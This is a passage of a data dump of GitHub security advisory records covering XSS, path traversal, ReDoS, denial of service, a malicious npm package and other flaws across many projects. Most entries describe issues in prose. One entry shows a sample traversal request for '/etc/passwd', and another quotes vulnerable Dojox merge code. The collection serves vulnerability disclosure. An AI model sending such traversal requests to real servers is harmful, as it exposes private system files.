'https://confluence.atlassian.com/pages/viewpage.action?pageId=1051986106'} | null |
GHSA | GHSA-xcr3-4qvr-54rh | Cross-site Scripting in Pimcore | Pimcore prior to version 10.4 is vulnerable to stored cross-site scripting in Tooltip. | {'CVE-2022-1351'} | 2022-04-22T20:46:45Z | 2022-04-15T00:00:45Z | MODERATE | 6.8 | {'CWE-79'} | {'https://huntr.dev/bounties/c23ae6c2-2e53-4bf5-85b0-e90418476615', 'https://github.com/pimcore/pimcore/commit/8c39a8b8f14dce078b31f61c4da599ca6f8fc7ac', 'https://nvd.nist.gov/vuln/detail/CVE-2022-1351', 'https://github.com/advisories/GHSA-xcr3-4qvr-54rh'} | null |
GHSA | GHSA-869j-5855-hjpm | Moderate severity vulnerability that affects org.apache.karaf:apache-karaf and org.apache.karaf:karaf | Apache Karaf kar deployer reads .kar archives and extracts the paths from the "repository/" and "resources/" entries in the zip file. It then writes out the content of these paths to the Karaf repo and resources directories. However, it doesn't do any validation on the paths in the zip file. This means that a malicious user could craft a .kar file with ".." directory names and break out of the directories to write arbitrary content to the filesystem. This is the "Zip-slip" vulnerability - https://snyk.io/research/zip-slip-vulnerability. This vulnerability is low if the Karaf process user has limited permission on the filesystem. Any Apache Karaf releases prior 4.2.3 is impacted. | {'CVE-2019-0191'} | 2021-09-03T22:59:30Z | 2019-03-25T16:16:44Z | MODERATE | 6.5 | {'CWE-22'} | {'https://github.com/advisories/GHSA-869j-5855-hjpm', 'https://nvd.nist.gov/vuln/detail/CVE-2019-0191', 'https://lists.apache.org/thread.html/6856aa7ed7dd805eaf65d0e5e95027dda3b2307aacd1ab4a838c5cd1@%3Cuser.karaf.apache.org%3E', 'https://lists.apache.org/thread.html/cef9a2d4b547625e5214684283ac5c59c9d9740e092e777dc3f85070@%3Ccommits.karaf.apache.org%3E', 'http://www.securityfocus.com/bid/107462'} | null |
GHSA | GHSA-xcrm-qpp8-hcw4 | Moderate severity vulnerability that affects org.apache.struts:struts2-rest-plugin | In Apache Struts 2.5 to 2.5.14, the REST Plugin is using an outdated JSON-lib library which is vulnerable and allow perform a DoS attack using malicious request with specially crafted JSON payload. | {'CVE-2017-15707'} | 2021-09-21T22:29:47Z | 2018-10-16T19:35:55Z | MODERATE | 6.2 | {'CWE-20'} | {'http://www.oracle.com/technetwork/security-advisory/cpuapr2018-3678067.html', 'https://cwiki.apache.org/confluence/display/WW/S2-054', 'https://security.netapp.com/advisory/ntap-20171214-0001/', 'http://www.oracle.com/technetwork/security-advisory/cpujul2018-4258247.html', 'https://nvd.nist.gov/vuln/detail/CVE-2017-15707', 'http://www.securitytracker.com/id/1039946', 'https://github.com/advisories/GHSA-xcrm-qpp8-hcw4', 'http://www.securityfocus.com/bid/102021'} | null |
GHSA | GHSA-9295-mhf3-v33m | Insecure temporary file in Netflix OSS Hollow | > ID: NFLX-2021-001
> Title: Local information disclosure in Hollow
> Release Date: 2021-03-23
> Credit: Security Researcher @JLLeitschuh
# Overview
Security researcher @JLLeitschuh reported that Netflix Hollow (a Netflix OSS project available here: https://github.com/Netflix/hollow) writes to a local temporary directory before validating the permissions on it.
# Impact
An attacker with the ability to create directories and set permissions on the local filesystem could pre-create this directory and read or modify anything written there by the Hollow process.
# Description
Since the `Files.exists(parent)` is run before creating the directories, an attacker can pre-create these directories with wide permissions. Additionally, since an insecure source of randomness is used, the file names to be created can be deterministically calculated.
# Workarounds and Fixes
Avoid running Hollow in configurations that share a filesystem with less-trusted processes. May be fixed in a future release. | {'CVE-2021-28099'} | 2021-03-30T16:13:42Z | 2021-03-29T18:25:26Z | MODERATE | 0 | {'CWE-377'} | {'https://github.com/advisories/GHSA-9295-mhf3-v33m', 'https://nvd.nist.gov/vuln/detail/CVE-2021-28099', 'https://github.com/Netflix/security-bulletins/blob/master/advisories/nflx-2021-001.md', 'https://github.com/JLLeitschuh/security-research/security/advisories/GHSA-j83w-7qr9-wv86', 'https://github.com/Netflix/hollow/issues/502'} | null |
GHSA | GHSA-w7j2-35mf-95p7 | Incorrect check on buffer length in rand_core | An issue was discovered in the rand_core crate before 0.6.2 for Rust. Because `read_u32_into` and `read_u64_into` mishandle certain buffer-length checks, a random number generator may be seeded with too little data. The vulnerability was introduced in v0.6.0. The advisory doesn't apply to earlier minor version numbers. | {'CVE-2021-27378'} | 2022-04-29T17:25:04Z | 2021-08-25T20:52:16Z | CRITICAL | 9.8 | {'CWE-330'} | {'https://rustsec.org/advisories/RUSTSEC-2021-0023.html', 'https://github.com/advisories/GHSA-w7j2-35mf-95p7', 'https://github.com/rust-random/rand/compare/0.6.0...rand_core-0.6.2#diff-f41b3dfa5ce28f3bee390d327c50621e141cf3569921f8e9ca15ccfcf25263a9R28', 'https://nvd.nist.gov/vuln/detail/CVE-2021-27378', 'https://github.com/rust-random/rand/compare/0.6.0...rand_core-0.6.2#diff-f41b3dfa5ce28f3bee390d327c50621e141cf3569921f8e9ca15ccfcf25263a9R19', 'https://github.com/rust-random/rand/pull/1096'} | null |
GHSA | GHSA-3hw5-q855-g6cw | Prototype Pollution in Dojox | The Dojox jQuery wrapper `jqMix` mixin method is vulnerable to Prototype Pollution.
Affected Area:
```
//https://github.com/dojo/dojox/blob/master/jq.js#L442
var tobj = {};
for(var x in props){
// the "tobj" condition avoid copying properties in "props"
// inherited from Object.prototype. For example, if obj has a custom
// toString() method, don't overwrite it with the toString() method
// that props inherited from Object.prototype
if((tobj[x] === undefined || tobj[x] != props[x]) && props[x] !== undefined && obj != props[x]){
if(dojo.isObject(obj[x]) && dojo.isObject(props[x])){
if(dojo.isArray(props[x])){
obj[x] = props[x];
}else{
obj[x] = jqMix(obj[x], props[x]);
}
}else{
obj[x] = props[x];
}
``` | {'CVE-2020-5259'} | 2021-02-18T19:45:36Z | 2020-03-10T18:03:32Z | LOW | 7.7 | {'CWE-94'} | {'https://github.com/advisories/GHSA-3hw5-q855-g6cw', 'https://nvd.nist.gov/vuln/detail/CVE-2020-5259', 'https://lists.debian.org/debian-lts-announce/2020/03/msg00012.html', 'https://github.com/dojo/dojox/security/advisories/GHSA-3hw5-q855-g6cw', 'https://github.com/dojo/dojox/commit/47d1b302b5b23d94e875b77b9b9a8c4f5622c9da'} | null |
GHSA | GHSA-jmf4-pq78-f8vj | Moderate severity vulnerability that affects org.apache.hive:hive-jdbc | In Apache Hive 2.3.3, 3.1.0 and earlier, Hive "EXPLAIN" operation does not check for necessary authorization of involved entities in a query. An unauthorized user can do "EXPLAIN" on arbitrary table or view and expose table metadata and statistics. | {'CVE-2018-1314'} | 2021-09-14T19:47:16Z | 2018-11-21T22:24:50Z | MODERATE | 4.3 | {'CWE-862'} | {'https://nvd.nist.gov/vuln/detail/CVE-2018-1314', 'http://www.securityfocus.com/bid/105884', 'https://github.com/advisories/GHSA-jmf4-pq78-f8vj', 'https://lists.apache.org/thread.html/3da47dbcbf09697387f29d2f1aed970523b6b334d93afd3cced23727@%3Cdev.hive.apache.org%3E'} | null |
GHSA | GHSA-4822-jvwx-w47h | Uncontrolled Resource Consumption in Matrix Synapse | ### Impact
Synapse before 1.52.0 with URL preview functionality enabled will attempt to generate URL previews for media stream URLs without properly limiting connection time. Connections will only be terminated after `max_spider_size` (default: 10M) bytes have been downloaded, which can in some cases lead to long-lived connections towards the streaming media server (for instance, Icecast).
This can cause excessive traffic and connections toward such servers if their stream URL is, for example, posted to a large room with many Synapse instances with URL preview enabled.
### Patches
1.52.0 implements a timeout mechanism which will terminate URL preview connections after 30 seconds. Since generating URL previews for media streams is not supported and always fails, 1.53.0 additionally implements an allow list for content types for which Synapse will even attempt to generate a URL preview.
We recommend upgrading to 1.53.0 to fully resolve the issue.
### Workarounds
Turn off URL preview functionality by setting `url_preview_enabled: false` in the Synapse configuration file.
### References
- Patch (timeout): https://github.com/matrix-org/synapse/pull/11784
- Patch (content type allow list): https://github.com/matrix-org/synapse/pull/11936
### For more information
If you have any questions or comments about this advisory, e-mail us at security@matrix.org.
| null | 2022-04-05T22:01:46Z | 2022-04-01T18:16:42Z | MODERATE | 0 | {'CWE-400'} | {'https://github.com/matrix-org/synapse/security/advisories/GHSA-4822-jvwx-w47h', 'https://github.com/matrix-org/synapse/releases/tag/v1.53.0', 'https://github.com/matrix-org/synapse/pull/11936', 'https://github.com/matrix-org/synapse/releases/tag/v1.52.0', 'https://github.com/matrix-org/synapse/pull/11784', 'https://github.com/advisories/GHSA-4822-jvwx-w47h'} | null |
GHSA | GHSA-p2hm-8725-c8x8 | Downloads Resources over HTTP in cue-sdk-node | Affected versions of `cue-sdk-node` insecurely download an executable over an unencrypted HTTP connection.
In scenarios where an attacker has a privileged network position, it is possible to intercept the response and replace the executable with a malicious one, resulting in code execution on the system running `cue-sdk-node`.
## Recommendation
No patch is currently available for this vulnerability.
The best mitigation is currently to avoid using this package, using a different package if available.
Alternatively, the risk of exploitation can be reduced by ensuring that this package is not installed while connected to a public network. If the package is installed on a private network, the only people who can exploit this vulnerability are those who have compromised your network or those who have privileged access to your ISP, such as Nation State Actors or Rogue ISP Employees. | {'CVE-2016-10590'} | 2021-01-08T18:24:36Z | 2019-02-18T23:50:58Z | HIGH | 0 | {'CWE-311'} | {'https://nvd.nist.gov/vuln/detail/CVE-2016-10590', 'https://www.npmjs.com/advisories/190', 'https://github.com/advisories/GHSA-p2hm-8725-c8x8', 'https://nodesecurity.io/advisories/190'} | null |
GHSA | GHSA-mv2r-q4g5-j8q5 | Microsoft.Data.OData Library improperly handles web requests | A denial of service vulnerability exists when OData Library improperly handles web requests, aka "OData Denial of Service Vulnerability." This affects Microsoft.Data.OData. | {'CVE-2018-8269'} | 2022-04-26T19:08:21Z | 2018-10-16T19:58:31Z | HIGH | 7.5 | null | {'https://github.com/advisories/GHSA-mv2r-q4g5-j8q5', 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8269', 'https://www.exploit-db.com/exploits/46101/', 'http://www.securityfocus.com/bid/105322', 'https://nvd.nist.gov/vuln/detail/CVE-2018-8269'} | null |
GHSA | GHSA-hgr5-82rc-p936 | Cross-Site Scripting in md-data-table | All versions of `md-data-table` are vulnerable to cross-site scripting (XSS). This vulnerability is exploitable if an attacker has control over data that is rendered by `mdt-row`
## Recommendation
As there is no fix for this vulnerability at this time we recommend either selecting another package to perform this functionality or properly sanitizing all user data prior to rendering with `md-data-table` | null | 2021-09-24T22:03:39Z | 2020-09-01T21:24:41Z | HIGH | 0 | {'CWE-79'} | {'https://github.com/advisories/GHSA-hgr5-82rc-p936', 'https://www.npmjs.com/advisories/748'} | null |
GHSA | GHSA-4hpf-3wq7-5rpr | Regular expression deinal of service (ReDoS) in is-my-json-valid | It was discovered that the is-my-json-valid JavaScript library used an inefficient regular expression to validate JSON fields defined to have email format. A specially crafted JSON file could cause it to consume an excessive amount of CPU time when validated. | {'CVE-2018-1107'} | 2022-01-06T20:44:07Z | 2022-01-06T20:44:07Z | MODERATE | 5.3 | {'CWE-400'} | {'https://snyk.io/vuln/npm:is-my-json-valid:20180214', 'https://bugzilla.redhat.com/show_bug.cgi?id=1546357', 'https://nvd.nist.gov/vuln/detail/CVE-2018-1107', 'https://github.com/advisories/GHSA-4hpf-3wq7-5rpr', 'https://github.com/mafintosh/is-my-json-valid/pull/159', 'https://github.com/mafintosh/is-my-json-valid/commit/b3051b277f7caa08cd2edc6f74f50aeda65d2976'} | null |
GHSA | GHSA-fr26-qjc8-mvjx | Possible route enumeration in production mode via RouteNotFoundError view in Vaadin 10, 11-14, and 15-19 | Improper sanitization of path in default `RouteNotFoundError` view in `com.vaadin:flow-server` versions 1.0.0 through 1.0.14 (Vaadin 10.0.0 through 10.0.18), 1.1.0 prior to 2.0.0 (Vaadin 11 prior to 14), 2.0.0 through 2.6.1 (Vaadin 14.0.0 through 14.6.1), and 3.0.0 through 6.0.9 (Vaadin 15.0.0 through 19.0.8) allows network attacker to enumerate all available routes via crafted HTTP request when application is running in production mode and no custom handler for `NotFoundException` is provided. | null | 2021-10-13T18:56:12Z | 2021-10-13T18:56:12Z | MODERATE | 5.3 | null | {'https://vaadin.com/security/cve-2021-31412', 'https://github.com/advisories/GHSA-fr26-qjc8-mvjx', 'https://github.com/vaadin/flow/security/advisories/GHSA-fr26-qjc8-mvjx'} | null |
GHSA | GHSA-g39q-f4rm-85x4 | OS Command Injection in baserCMS | baserCMS versions prior to 4.4.5 allows a remote attacker with an administrative privilege to execute arbitrary OS commands via unspecified vectors. | {'CVE-2021-20682'} | 2021-06-08T20:10:37Z | 2021-06-08T20:10:37Z | HIGH | 7.2 | {'CWE-78'} | {'https://github.com/baserproject/basercms', 'https://nvd.nist.gov/vuln/detail/CVE-2021-20682', 'https://jvn.jp/en/jp/JVN64869876/index.html', 'https://github.com/advisories/GHSA-g39q-f4rm-85x4', 'https://basercms.net/security/JVN64869876', 'https://packagist.org/packages/baserproject/basercms'} | null |
GHSA | GHSA-rp4x-wxqv-cf9m | Reflected cross-site scripting in default RouteNotFoundError view in Vaadin 10 and 11-13 | Missing output sanitization in default `RouteNotFoundError` view in `com.vaadin:flow-server` versions 1.0.0 through 1.0.10 (Vaadin 10.0.0 through 10.0.13), and 1.1.0 through 1.4.2 (Vaadin 11.0.0 through 13.0.5) allows attacker to execute malicious JavaScript via crafted URL.
- https://vaadin.com/security/cve-2019-25027 | {'CVE-2019-25027'} | 2021-05-06T17:13:01Z | 2021-04-19T14:52:29Z | MODERATE | 6.1 | {'CWE-81', 'CWE-79'} | {'https://vaadin.com/security/cve-2019-25027', 'https://github.com/vaadin/flow/security/advisories/GHSA-rp4x-wxqv-cf9m', 'https://nvd.nist.gov/vuln/detail/CVE-2019-25027', 'https://github.com/advisories/GHSA-rp4x-wxqv-cf9m', 'https://github.com/vaadin/flow/pull/5498'} | null |
GHSA | GHSA-x8wj-6m73-gfqp | Relative Path Traversal (CWE-23) in chunked uploads in oneup/uploader-bundle | ### Impact
The vulnerability was identified in the web service for a chunked file
upload. While the names of the POST parameters vary with the used
frontend, their values are always used in the same way to build a path
where the chunks are stored and assembled temporarily. By not validating
these parameters properly, OneupUploaderBundle is susceptible to a path
traversal vulnerability which can be exploited to upload files to
arbitrary folders on the filesystem. The assembly process can further be
misused with some restrictions to delete and copy files to other
locations.
The vulnerability can be exploited by any users that have legitimate
access to the upload functionality and can lead to arbitrary code
execution, denial of service and disclosure of confidential information.
### Patches
Yes, see version 1.9.3 and 2.1.5.
### References
https://owasp.org/www-community/attacks/Path_Traversal
### Credits:
This security vulnerability was found by Thibaud Kehler of SySS GmbH.
E-Mail: thibaud.kehler@syss.de | {'CVE-2020-5237'} | 2022-01-04T19:45:22Z | 2020-02-18T18:59:24Z | HIGH | 8.8 | {'CWE-23', 'CWE-22'} | {'https://github.com/advisories/GHSA-x8wj-6m73-gfqp', 'https://nvd.nist.gov/vuln/detail/CVE-2020-5237', 'https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2020-003.txt', 'https://github.com/1up-lab/OneupUploaderBundle/security/advisories/GHSA-x8wj-6m73-gfqp', 'https://github.com/1up-lab/OneupUploaderBundle/commit/a6011449b716f163fe1ae323053077e59212350c'} | null |
GHSA | GHSA-r8hx-3qx6-hxq9 | Malicious Package in commandre | All versions of this package contained malware. The package was designed to find and exfiltrate cryptocurrency wallets.
## Recommendation
Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer.
The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it. | null | 2021-10-01T20:59:18Z | 2020-09-03T19:41:14Z | CRITICAL | 9.1 | {'CWE-506'} | {'https://www.npmjs.com/advisories/1387', 'https://github.com/advisories/GHSA-r8hx-3qx6-hxq9'} | null |
GHSA | GHSA-jcxc-rh6w-wf49 | Link Following in Iris | This affects all versions of package github.com/kataras/iris; all versions of package github.com/kataras/iris/v12. The unsafe handling of file names during upload using UploadFormFiles method may enable attackers to write to arbitrary locations outside the designated target folder. | {'CVE-2021-23772'} | 2022-04-01T21:02:48Z | 2022-01-06T21:36:19Z | HIGH | 7.5 | {'CWE-59'} | {'https://github.com/advisories/GHSA-jcxc-rh6w-wf49', 'https://snyk.io/vuln/SNYK-GOLANG-GITHUBCOMKATARASIRIS-2325169', 'https://snyk.io/vuln/SNYK-GOLANG-GITHUBCOMKATARASIRISV12-2325170', 'https://github.com/kataras/iris/commit/e213dba0d32ff66653e0ef124bc5088817264b08', 'https://nvd.nist.gov/vuln/detail/CVE-2021-23772'} | null |
GHSA | GHSA-qmv4-jgp7-mf68 | Broken CORS in sails | Affected versions of `sails` have an issue with the CORS configuration where the value of the origin header is reflected as the value for the `Access-Control-Allow-Origin` header. This may allow an attacker to make AJAX requests to vulnerable hosts through cross-site scripting or a malicious HTML Document, effectively bypassing the Same Origin Policy.
## Mitigating Factors
This is only an issue when `allRoutes` is set to `true` and `origin` is set to `*` or left commented out in the sails CORS config file.
The problem can be compounded when the cors `credentials` setting is not provided, because at that point authenticated cross domain requests are possible.
## Recommendation
Update to version 0.12.7 or later.
As this vulnerability is primarily a user error, the patch for the vulnerability will simply cause the application to write an error message to the console when a vulnerable configuration is used in a production environment.
Writing a proper CORS configuration is still the responsibility of the user, so it is necessary to check for the error message after installing the patch. Be sure you are not using `allRoutes: true` with `origin:'*'`, and that you uncomment `origin` and set it to a reasonable value. Ensure that if `origin` is set to `*` that you truly mean for all other websites to be able to make cross-domain requests to your API.
Likewise, ensure `credentials` is uncommented out and set to the appropriate value. Make sure to explicitly set which origins may request resources via CORS. | {'CVE-2016-10549'} | 2021-01-08T01:58:25Z | 2019-02-18T23:40:10Z | HIGH | 0 | {'CWE-284'} | {'https://github.com/advisories/GHSA-qmv4-jgp7-mf68', 'https://www.npmjs.com/advisories/148', 'http://sailsjs.org/documentation/concepts/security/cors', 'http://sailsjs.org/documentation/reference/configuration/sails-config-cors', 'https://nodesecurity.io/advisories/148', 'https://nvd.nist.gov/vuln/detail/CVE-2016-10549'} | null |
GHSA | GHSA-45xm-v8gq-7jqx | Excessive memory allocation | In version from 3.0.0 to 3.5.3 of Eclipse Vert.x, the WebSocket HTTP upgrade implementation buffers the full http request before doing the handshake, holding the entire request body in memory. There should be a reasonnable limit (8192 bytes) above which the WebSocket gets an HTTP response with the 413 status code and the connection gets closed. | {'CVE-2018-12541'} | 2022-04-25T20:23:46Z | 2018-10-17T16:19:59Z | MODERATE | 6.5 | {'CWE-119', 'CWE-789'} | {'https://lists.apache.org/thread.html/r8db0431ecf93f2dd2128db5ddca897b33ba883b7f126648d6a9e4c47@%3Ccommits.pulsar.apache.org%3E', 'https://github.com/advisories/GHSA-45xm-v8gq-7jqx', 'https://nvd.nist.gov/vuln/detail/CVE-2018-12541', 'https://lists.apache.org/thread.html/re5ddabee26fbcadc7254d03a5a073d64080a9389adc9e452529664ed@%3Ccommits.pulsar.apache.org%3E', 'https://lists.apache.org/thread.html/reb3cc4f3e10264896a541813c0030ec9d9466ba9b722fe5d4adc91cd@%3Cissues.bookkeeper.apache.org%3E', 'https://lists.apache.org/thread.html/r11789cd6d67ecca2d6f6bbb11e34495e68ee99287b6c59edf5b1a09c@%3Ccommits.pulsar.apache.org%3E', 'https://github.com/eclipse-vertx/vert.x/issues/2648', 'https://lists.apache.org/thread.html/rd0e44e8ef71eeaaa3cf3d1b8b41eb25894372e2995ec908ce7624d26@%3Ccommits.pulsar.apache.org%3E', 'https://lists.apache.org/thread.html/r01123837ffbfdf5809e0a4ac354ad546e4ca8f18df89ee5a10eeb81b@%3Cissues.bookkeeper.apache.org%3E', 'https://lists.apache.org/thread.html/r362835e6c7f34324ed24e318b363fcdd20cea91d0cea0b2e1164f73e@%3Cissues.bookkeeper.apache.org%3E', 'https://bugs.eclipse.org/bugs/show_bug.cgi?id=539170', 'https://lists.apache.org/thread.html/r344235b1aea2f7fa2381495df1d77d02b595e3d7e4626e701f7c1062@%3Ccommits.pulsar.apache.org%3E', 'https://access.redhat.com/errata/RHSA-2018:2946', 'https://lists.apache.org/thread.html/r3da899890536af744dec897fbc561fd9810ac45e79a16164b53c31b2@%3Ccommits.pulsar.apache.org%3E', 'https://lists.apache.org/thread.html/r1af71105539fe01fcecb92d2ecd8eea56c515fb1c80ecab4df424553@%3Cissues.bookkeeper.apache.org%3E', 'https://lists.apache.org/thread.html/r79789a0afb184abd13a2c07016e6e7ab8e64331f332b630bf82a2eed@%3Ccommits.pulsar.apache.org%3E', 'https://lists.apache.org/thread.html/r98dc06e2b1c498d0e9eb5038d8e1aefd24e411e50522e7082dd9e0b7@%3Ccommits.bookkeeper.apache.org%3E', 'https://lists.apache.org/thread.html/rbdc279ecdb7ac496a03befb05a53605c4ce2b67e14f8f4df4cfa1203@%3Cissues.bookkeeper.apache.org%3E'} | null |
GHSA | GHSA-hv5f-73mr-7vvj | Cross-site Scripting in Mattermost | Mattermost 5.38 and earlier fails to sufficiently sanitize clipboard contents, which allows a user-assisted attacker to inject arbitrary web script in product deployments that explicitly disable the default CSP. | {'CVE-2021-37860'} | 2021-10-06T13:08:14Z | 2021-09-23T23:11:06Z | MODERATE | 6.1 | {'CWE-79'} | {'https://nvd.nist.gov/vuln/detail/CVE-2021-37860', 'https://github.com/advisories/GHSA-hv5f-73mr-7vvj', 'https://mattermost.com/security-updates/', 'https://docs.mattermost.com/install/self-managed-changelog.html#release-v5-39-quality-release'} | null |
GHSA | GHSA-pq5x-rprq-8jrj | Directory Traversal in exxxxxxxxxxx | Affected versions of `exxxxxxxxxxx` resolve relative file paths, resulting in a directory traversal vulnerability. A malicious actor can use this vulnerability to access files outside of the intended directory root, which may result in the disclosure of private files on the vulnerable system.
This vulnerability is only effective for files that have a file extension, which provides a partial mitigation.
Example request:
```
GET /../../../../../../../../../../etc/passwd HTTP/1.1
host:foo
```
## Recommendation
No patch is available for this vulnerability.
It is recommended that the package is only used for local development, and if the functionality is needed for production, a different package is used instead. | {'CVE-2017-16130'} | 2021-01-08T18:19:46Z | 2018-07-23T22:06:14Z | HIGH | 0 | {'CWE-22'} | {'https://nvd.nist.gov/vuln/detail/CVE-2017-16130', 'https://github.com/advisories/GHSA-pq5x-rprq-8jrj', 'https://www.npmjs.com/advisories/478', 'https://github.com/JacksonGL/NPM-Vuln-PoC/blob/master/directory-traversal/exxxxxxxxxxx', 'https://nodesecurity.io/advisories/478'} | null |
GHSA | GHSA-jvpp-hxjj-5ccc | Improper Input Validation and Missing Authentication for Critical Function in Apache ActiveMQ | It was found that the Apache ActiveMQ client before 5.15.5 exposed a remote shutdown command in the ActiveMQConnection class. An attacker logged into a compromised broker could use this flaw to achieve denial of service on a connected client. | {'CVE-2015-7559'} | 2021-08-17T20:27:35Z | 2019-08-01T19:17:45Z | MODERATE | 4.9 | {'CWE-306', 'CWE-20'} | {'https://nvd.nist.gov/vuln/detail/CVE-2015-7559', 'https://github.com/advisories/GHSA-jvpp-hxjj-5ccc', 'https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2015-7559', 'https://issues.apache.org/jira/browse/AMQ-6470'} | null |
GHSA | GHSA-7j44-fv4x-79g9 | Improper Input Validation in once_cell | An issue was discovered in the once_cell crate before 1.0.1 for Rust. There is a panic during initialization of Lazy. | {'CVE-2019-16141'} | 2021-08-25T20:44:18Z | 2021-08-25T20:44:18Z | MODERATE | 7.5 | {'CWE-20'} | {'https://github.com/matklad/once_cell/issues/46', 'https://nvd.nist.gov/vuln/detail/CVE-2019-16141', 'https://github.com/advisories/GHSA-7j44-fv4x-79g9', 'https://rustsec.org/advisories/RUSTSEC-2019-0017.html'} | null |
GHSA | GHSA-xh99-hw7h-wf63 | Unchecked validity of Facing values in PlayerActionPacket | ### Impact
A remote attacker may crash a server by sending `PlayerActionPacket` with invalid facing values (e.g. negative), specifically with `START_BREAK` or `CRACK_BLOCK` actions, or with a `UseItemTransactionData` (typically in `InventoryTransactionPacket`).
### Patches
f126479c37ff00a717a828f5271cf8e821d12d6c
### Workarounds
Using a plugin, cancel `DataPacketReceiveEvent` if the packet is `PlayerActionPacket` and the facing is outside the range 0-5 when receiving START_BREAK or CRACK_BLOCK actions, or UseItemTransactionData. However, beware that negative values may be legitimate in some cases.
### For more information
If you have any questions or comments about this advisory:
* Email us at [team@pmmp.io](mailto:team@pmmp.io)
| null | 2022-01-13T22:25:44Z | 2022-01-13T22:25:44Z | HIGH | 7.5 | null | {'https://github.com/pmmp/PocketMine-MP/commit/f126479c37ff00a717a828f5271cf8e821d12d6c', 'https://github.com/advisories/GHSA-xh99-hw7h-wf63', 'https://github.com/pmmp/PocketMine-MP/security/advisories/GHSA-xh99-hw7h-wf63'} | null |
GHSA | GHSA-c9hw-wf7x-jp9j | Improper Privilege Management in Tomcat | When using the Apache JServ Protocol (AJP), care must be taken when trusting incoming connections to Apache Tomcat. Tomcat treats AJP connections as having higher trust than, for example, a similar HTTP connection. If such connections are available to an attacker, they can be exploited in ways that may be surprising. In Apache Tomcat 9.0.0.M1 to 9.0.0.30, 8.5.0 to 8.5.50 and 7.0.0 to 7.0.99, Tomcat shipped with an AJP Connector enabled by default that listened on all configured IP addresses. It was expected (and recommended in the security guide) that this Connector would be disabled if not required. This vulnerability report identified a mechanism that allowed: returning arbitrary files from anywhere in the web application, processing any file in the web application as a JSP Further, if the web application allowed file upload and stored those files within the web application (or the attacker was able to control the content of the web application by some other means) then this, along with the ability to process a file as a JSP, made remote code execution possible. It is important to note that mitigation is only required if an AJP port is accessible to untrusted users. Users wishing to take a defence-in-depth approach and block the vector that permits returning arbitrary files and execution as JSP may upgrade to Apache Tomcat 9.0.31, 8.5.51 or 7.0.100 or later. A number of changes were made to the default AJP Connector configuration in 9.0.31 to harden the default configuration. It is likely that users upgrading to 9.0.31, 8.5.51 or 7.0.100 or later will need to make small changes to their configurations. | {'CVE-2020-1938'} | 2022-05-02T16:27:26Z | 2020-06-15T18:51:21Z | CRITICAL | 9.8 | {'CWE-269'} | {'https://lists.apache.org/thread.html/r57f5e4ced436ace518a9e222fabe27fb785f09f5bf974814cc48ca97@%3Ccommits.tomee.apache.org%3E', 'https://www.debian.org/security/2020/dsa-4680', 'https://www.oracle.com/security-alerts/cpujan2021.html', 'https://lists.apache.org/thread.html/r43faacf64570b1d9a4bada407a5af3b2738b0c007b905f1b6b608c65@%3Cusers.tomcat.apache.org%3E', 'https://lists.apache.org/thread.html/r772335e6851ad33ddb076218fa4ff70de1bf398d5b43e2ddf0130e5d@%3Cdev.tomcat.apache.org%3E', 'https://lists.debian.org/debian-lts-announce/2020/05/msg00026.html', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/2XFLQB3O5QVP4ZBIPVIXBEZV7F2R7ZMS/', 'https://lists.apache.org/thread.html/ra7092f7492569b39b04ec0decf52628ba86c51f15efb38f5853e2760@%3Cnotifications.ofbiz.apache.org%3E', 'https://lists.apache.org/thread.html/r5e2f1201b92ee05a0527cfc076a81ea0c270be299b87895c0ddbe02b@%3Cusers.tomcat.apache.org%3E', 'https://lists.apache.org/thread.html/r17aaa3a05b5b7fe9075613dd0c681efa60a4f8c8fbad152c61371b6e@%3Cusers.tomcat.apache.org%3E', 'https://lists.apache.org/thread.html/r6a5633cad1b560a1e51f5b425f02918bdf30e090fdf18c5f7c2617eb@%3Ccommits.tomee.apache.org%3E', 'http://support.blackberry.com/kb/articleDetail?articleNumber=000062739', 'https://lists.apache.org/thread.html/r1125f3044a0946d1e7e6f125a6170b58d413ebd4a95157e4608041c7@%3Cannounce.apache.org%3E', 'https://www.oracle.com/security-alerts/cpujul2020.html', 'https://lists.apache.org/thread.html/rd50baccd1bbb96c2327d5a8caa25a49692b3d68d96915bd1cfbb9f8b@%3Cusers.tomcat.apache.org%3E', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/L46WJIV6UV3FWA5O5YEY6XLA73RYD53B/', 'https://lists.apache.org/thread.html/r8f7484589454638af527182ae55ef5b628ba00c05c5b11887c922fb1@%3Cnotifications.ofbiz.apache.org%3E', 'https://lists.apache.org/thread.html/rcd5cd301e9e7e39f939baf2f5d58704750be07a5e2d3393e40ca7194@%3Ccommits.tomee.apache.org%3E', 'https://lists.apache.org/thread.html/r4afa11e0464408e68f0e9560e90b185749363a66398b1491254f7864@%3Cusers.tomcat.apache.org%3E', 'https://lists.apache.org/thread.html/r7c6f492fbd39af34a68681dbbba0468490ff1a97a1bd79c6a53610ef%40%3Cannounce.tomcat.apache.org%3E', 'https://www.debian.org/security/2020/dsa-4673', 'https://lists.apache.org/thread.html/r75113652e46c4dee687236510649acfb70d2c63e074152049c3f399d@%3Cnotifications.ofbiz.apache.org%3E', 'https://lists.apache.org/thread.html/rb1c0fb105ce2b93b7ec6fc1b77dd208022621a91c12d1f580813cfed@%3Cdev.tomcat.apache.org%3E', 'https://lists.apache.org/thread.html/r92d78655c068d0bc991d1edbdfb24f9c5134603e647cade1113d4e0a@%3Cusers.tomee.apache.org%3E', 'https://lists.apache.org/thread.html/r549b43509e387a42656f0641fa311bf27c127c244fe02007d5b8d6f6@%3Cdev.tomcat.apache.org%3E', 'http://lists.opensuse.org/opensuse-security-announce/2020-03/msg00025.html', 'https://lists.debian.org/debian-lts-announce/2020/03/msg00006.html', 'https://lists.apache.org/thread.html/r74328b178f9f37fe759dffbc9c1f2793e66d79d7a8a20d3836551794@%3Cnotifications.ofbiz.apache.org%3E', 'https://lists.apache.org/thread.html/r9f119d9ce9239114022e13dbfe385b3de7c972f24f05d6dbd35c1a2f@%3Cusers.tomcat.apache.org%3E', 'https://lists.apache.org/thread.html/rf992c5adf376294af31378a70aa8a158388a41d7039668821be28df3@%3Ccommits.tomee.apache.org%3E', 'https://nvd.nist.gov/vuln/detail/CVE-2020-1938', 